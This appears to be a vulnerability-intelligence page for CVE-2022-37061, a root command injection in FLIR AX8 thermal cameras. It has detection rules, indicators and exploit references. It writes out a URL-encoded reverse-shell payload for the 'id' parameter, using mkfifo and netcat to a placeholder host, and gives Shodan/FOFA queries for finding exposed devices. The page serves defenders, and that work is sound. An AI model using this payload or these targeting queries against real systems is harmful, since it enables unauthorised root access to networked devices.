CVE-2022-37061
published 2022-08-18CVE-2022-37061: All FLIR AX8 thermal sensor cameras version up to and including 1.46.16 are vulnerable to Remote Command Injection. This can be exploited to inject and execute…
PriorityP192critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
99.62%
99.9th percentile
All FLIR AX8 thermal sensor cameras version up to and including 1.46.16 are vulnerable to Remote Command Injection. This can be exploited to inject and execute arbitrary shell commands as the root user through the id HTTP POST parameter in the res.php endpoint. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the root privileges. NOTE: The vendor has stated that with the introduction of firmware version 1.49.16 (Jan 2023) the FLIR AX8 should no longer be affected by the vulnerability reported. Latest firmware version (as of Oct 2025, was released Jun 2024) is 1.55.16.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| flir | flir_ax8_firmware | <= 1.46.16 | — |
Detection & IOCsextracted from sources · hover to see the quote
commandaction=alarm&id=2;rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%20{}%20{}%20%3E%2Ftmp%2Ff↗
snort
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS FLIR res.php id Parameter Command Injection Attempt (CVE-2022-37061)"; flow:established,to_server; http.method; content:"POST"; http.uri; bsize:8; content:"/res.php"; fast_pattern; http.request_body; content:"action|3d|alarm"; content:"id|3d|"; pcre:"/^[^\x26]*?(?:(?:\x3b|%3[Bb])|(?:\x0a|%0[Aa])|(?:\x60|%60)|(?:\x7c|%7[Cc])|(?:\x24|%24))+/R"; reference:url,www.cve.org/CVERecord?id=CVE-2022-37061; reference:cve,2022-37061; classtype:attempted-admin; sid:2065895; rev:1; metadata:affected_product FLIR, attack_target Networking_Equipment, tls_state plaintext, created_at 2025_11_24, cve CVE_2022_37061, deployment Perimeter, deployment Internal, performance_impact Low, confidence High, signature_severity Major, tag Exploit, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2025_11_24, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
yara
regex: 'uid=([0-9(a-z)]+)' AND 'gid=([0-9(a-z)]+)' AND 'visualBeep' in HTTP response body
- →Look for HTTP POST requests to /res.php with a body containing 'action=alarm' and an 'id' parameter value that includes shell metacharacters (;, |, `, $, newline) — this is the injection point for CVE-2022-37061. ↗
- →The Emerging Threats Snort rule (sid:2065895) fires on POST /res.php with body matching 'action=alarm' and 'id=' followed by shell injection metacharacters via PCRE: /^[^\x26]*?(?:(?:\x3b|%3[Bb])|(?:\x0a|%0[Aa])|(?:\x60|%60)|(?:\x7c|%7[Cc])|(?:\x24|%24))+/R ↗
- →Successful exploitation produces a response body containing both 'uid=' and 'gid=' output (from the injected 'id' OS command) alongside the string 'visualBeep' from the normal alarm response — use this combination to confirm exploitation.
- →The exploit is unauthenticated — no prior login session is required to reach /res.php and inject commands. Monitor for POST requests to /res.php from unauthenticated sources. ↗
- →Shodan/FOFA exposure queries for vulnerable devices: Shodan title:"FLIR", FOFA app="FLIR-AX8" — use these to identify internet-exposed instances.
- →The reverse shell payload uses the classic mkfifo+netcat pattern URL-encoded in the id parameter: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <LHOST> <LPORT> >/tmp/f — watch for this pattern in POST body or process trees on the device. ↗
- →The Metasploit module for this CVE uploads and executes a payload to gain root — look for unexpected file writes or process spawns from the web server process on FLIR AX8 devices. ↗
- ·The vulnerability is only present in FLIR AX8 firmware versions up to and including 1.46.16. Firmware 1.49.16 (Jan 2023) and later are not affected. ↗
- ·The ET Snort rule (sid:2065895) is scoped to plaintext HTTP traffic only (tls_state plaintext) — encrypted HTTPS traffic to the device will not be detected by this rule. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-r2vv-rr99-h5p9: All FLIR AX8 thermal sensor cameras version up to and including 1
ghsa_unreviewed·2022-08-19
CVE-2022-37061 [CRITICAL] CWE-78 GHSA-r2vv-rr99-h5p9: All FLIR AX8 thermal sensor cameras version up to and including 1
All FLIR AX8 thermal sensor cameras version up to and including 1.46.16 are vulnerable to Remote Command Injection. This can be exploited to inject and execute arbitrary shell commands as the root user through the id HTTP POST parameter in the res.php endpoint. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the root privileges.
VulnCheck
flir flir_ax8_firmware Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck·2022·CVSS 9.8
CVE-2022-37061 [CRITICAL] flir flir_ax8_firmware Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
flir flir_ax8_firmware Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
All FLIR AX8 thermal sensor cameras version up to and including 1.46.16 are vulnerable to Remote Command Injection. This can be exploited to inject and execute arbitrary shell commands as the root user through the id HTTP POST parameter in the res.php endpoint. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the root privileges. NOTE: The vendor has stated that with the introduction of firmware version 1.49.16 (Jan 2023) the FLIR AX8 should no longer be affected by the vulnerability reported. Latest firmware version (as of Oct 2025, was released Jun 2024) is 1.55.16.
Affected: flir flir_ax8_firmware
Required
Suricata
ET WEB_SPECIFIC_APPS FLIR res.php id Parameter Command Injection Attempt (CVE-2022-37061)
suricata·2025-11-24·CVSS 9.8
CVE-2022-37061 [CRITICAL] ET WEB_SPECIFIC_APPS FLIR res.php id Parameter Command Injection Attempt (CVE-2022-37061)
ET WEB_SPECIFIC_APPS FLIR res.php id Parameter Command Injection Attempt (CVE-2022-37061)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS FLIR res.php id Parameter Command Injection Attempt (CVE-2022-37061)"; flow:established,to_server; http.method; content:"POST"; http.uri; bsize:8; content:"/res.php"; fast_pattern; http.request_body; content:"action|3d|alarm"; content:"id|3d|"; pcre:"/^[^\x26]*?(?:(?:\x3b|%3[Bb])|(?:\x0a|%0[Aa])|(?:\x60|%60)|(?:\x7c|%7[Cc])|(?:\x24|%24))+/R"; reference:url,www.cve.org/CVERecord?id=CVE-2022-37061; reference:cve,2022-37061; classtype:attempted-admin; sid:2065895; rev:1; metadata:affected_product FLIR, attack_target Networking_Equipment, tls_state plaintext, created_at 2025_11_24, cve CVE_2022_37061, deployment Perimeter, deployment In
Exploit-DB
FLIR AX8 1.46.16 - Remote Command Injection
exploitdb·2025-04-16·CVSS 9.8
CVE-2022-37061 [CRITICAL] FLIR AX8 1.46.16 - Remote Command Injection
FLIR AX8 1.46.16 - Remote Command Injection
---
# Exploit Title: FLIR AX8 1.46.16 - Remote Command Injection
# Date: 8/19/2022
# Exploit Author: Samy Younsi Naqwada (https://samy.link), SC
# Vendor Homepage: https://www.flir.com/
# Software Link: https://www.flir.com/products/ax8-automation/
# PoC: https://www.youtube.com/watch?v=dh0_rfAIWok
# Version: 1.46.16 and under.
# Tested on: FLIR AX8 version 1.46.16 (Ubuntu)
# CVE : CVE-2022-37061
from __future__ import print_function, unicode_literals
from bs4 import BeautifulSoup
import argparse
import requests
import json
import urllib3
urllib3.disable_warnings()
def banner():
flirLogo = """
███████╗██╗ ██╗██████╗
██╔════╝██║ ██║██╔══██╗
█████╗ ██║ ██║██████╔╝
██╔══╝ ██║ ██║██╔══██╗
██║ ███████╗██║██║ ██║
╚═╝ ╚══════╝╚═╝╚═╝ ╚═╝
.----------
Nuclei
FLIR AX8 1.46.16 - Remote Command Injection
nuclei·CVSS 9.8
CVE-2022-37061 [CRITICAL] FLIR AX8 1.46.16 - Remote Command Injection
FLIR AX8 1.46.16 - Remote Command Injection
FLIR AX8 version 1.46.16 and below is susceptible to an unauthenticated remote command injection vulnerability.The vulnerability exists in the alarm functionality where user-supplied input in the 'id' parameter is not properly sanitized,allowing attackers to inject and execute arbitrary OS commands.
Template:
id: CVE-2022-37061
info:
name: FLIR AX8 1.46.16 - Remote Command Injection
author: ritikchaddha
severity: critical
description: |
FLIR AX8 version 1.46.16 and below is susceptible to an unauthenticated remote command injection vulnerability.The vulnerability exists in the alarm functionality where user-supplied input in the 'id' parameter is not properly sanitized,allowing attackers to inject and execute arbitrary OS commands.
impact: |
Metasploit
FLIR AX8 unauthenticated RCE
metasploit
FLIR AX8 unauthenticated RCE
FLIR AX8 unauthenticated RCE
All FLIR AX8 thermal sensor cameras versions up to and including 1.46.16 are vulnerable to Remote Command Injection. This can be exploited to inject and execute arbitrary shell commands as the root user through the id HTTP POST parameter in the res.php endpoint. This module uses the vulnerability to upload and execute payloads gaining root privileges.
Unit42
IoT Under Siege: The Anatomy of the Latest Mirai Campaign Leveraging Multiple IoT Exploits
blogs_unit42·2023-06-22·CVSS 9.8
CVE-2019-12725 [CRITICAL] IoT Under Siege: The Anatomy of the Latest Mirai Campaign Leveraging Multiple IoT Exploits
## Executive Summary
Since March 2023, Unit 42 researchers have observed threat actors leveraging several IoT vulnerabilities to spread a variant of the Mirai botnet. The vulnerabilities exploited include those listed in the following table:
CVE/Product
Description
CVE-2019-12725
Zeroshell Remote Command Execution Vulnerability
CVE-2019-17621
D-Link DIR-859 Remote Command Injection Vulnerability
CVE-2019-20500
D-Link DWL-2600AP Remote Command Execution Vulnerability
CVE-2021-25296
Nagios XI Remote Command Injection Vulnerability
CVE-2021-46422
Telesquare SDT-CW3B1 Router Command Injection Vulnerability
CVE-2022-27002
Arris TR3300 Remote Command Injection Vulnerability
CVE-2022-29303
SolarView Compact Command Injection Vulnerability
CVE-2022-30023
Tenda HG9 Router Command Injectio
Unit42
IoT Under Siege: The Anatomy of the Latest Mirai Campaign Leveraging Multiple IoT Exploits
blogs_unit42·2023-06-22·CVSS 9.8
CVE-2019-12725 [CRITICAL] IoT Under Siege: The Anatomy of the Latest Mirai Campaign Leveraging Multiple IoT Exploits
Threat Research Center
Trend Reports
Vulnerabilities
## IoT Under Siege: The Anatomy of the Latest Mirai Campaign Leveraging Multiple IoT Exploits
Chao Lei
Zhibin Zhang
Yiheng An
Cecilia Hu
Published: June 22, 2023
Trend Reports
Vulnerabilities
Botnet
CVE-2019-12725
CVE-2019-17621
CVE-2019-20500
CVE-2021-25296
CVE-2021-46422
CVE-2022-27002
CVE-2022-29303
CVE-2022-30023
CVE-2022-30525
CVE-2022-31499
CVE-2022-36266
CVE-2022-40005
CVE-2022-45699
CVE-2023-1389
CVE-2023-25280
CVE-2023-27240
IoT
IoT Security
Mirai
## Executive Summary
Since March 2023, Unit 42 researchers have observed threat actors leveraging several IoT vulnerabilities to spread a variant of the Mirai botnet. The vulnerabilities exploited include those listed in the following table:
CVE/Pro
http://packetstormsecurity.com/files/168114/FLIX-AX8-1.46.16-Remote-Command-Execution.htmlhttp://packetstormsecurity.com/files/168116/FLIR-AX8-1.46.16-Traversal-Access-Control-Command-Injection-XSS.htmlhttp://packetstormsecurity.com/files/169701/FLIR-AX8-1.46.16-Remote-Command-Injection.htmlhttps://gist.github.com/Nwqda/9e16852ab7827dc62b8e44d6180a6899https://github.com/WlX-33/PoC-for-CVE/blob/main/CVE-2022-36266/FLIR%20AX8%20Unauthenticated%20OS%20Command%20Injection.pyhttps://www.flir.com/products/ax8-automation/https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5491.phphttp://packetstormsecurity.com/files/168114/FLIX-AX8-1.46.16-Remote-Command-Execution.htmlhttp://packetstormsecurity.com/files/168116/FLIR-AX8-1.46.16-Traversal-Access-Control-Command-Injection-XSS.htmlhttp://packetstormsecurity.com/files/169701/FLIR-AX8-1.46.16-Remote-Command-Injection.htmlhttps://gist.github.com/Nwqda/9e16852ab7827dc62b8e44d6180a6899https://www.flir.com/products/ax8-automation/https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5491.php
2022-08-18
Published
Exploited in the wild